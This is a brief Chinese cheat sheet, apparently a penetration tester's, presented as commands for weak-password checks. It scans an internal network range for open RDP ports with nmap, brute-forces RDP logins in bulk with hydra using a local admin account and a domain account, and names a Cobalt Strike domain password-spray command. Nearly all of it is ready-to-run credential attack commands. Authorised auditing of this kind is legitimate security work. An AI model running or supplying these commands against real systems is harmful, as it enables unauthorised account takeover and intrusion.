工作中经常需要进行弱口令检查,这是一些常用命令
#扫描内网网段中的3389,存为txt
nmap 192.168.0.0/16 -sS -T4 -n -p 3389 --open | grep 'Nmap scan report for' | cut -f 5 -d ' ' >3389.txt
#使用admin批量破解本地账户登录
hydra -l admin -P /home/kali/Desktop/password_rdp.txt -M 3389.txt rdp -V -o 3389-result.txt -I -K -f
#使用域账户user1批量破解域账户登录
hydra -l user1 -P /home/kali/Desktop/password_rdp.txt -M 3389.txt rdp pentest.com -V -o 3389-result.txt -I -K -f
#域密码喷射
cobaltstrike spray-AD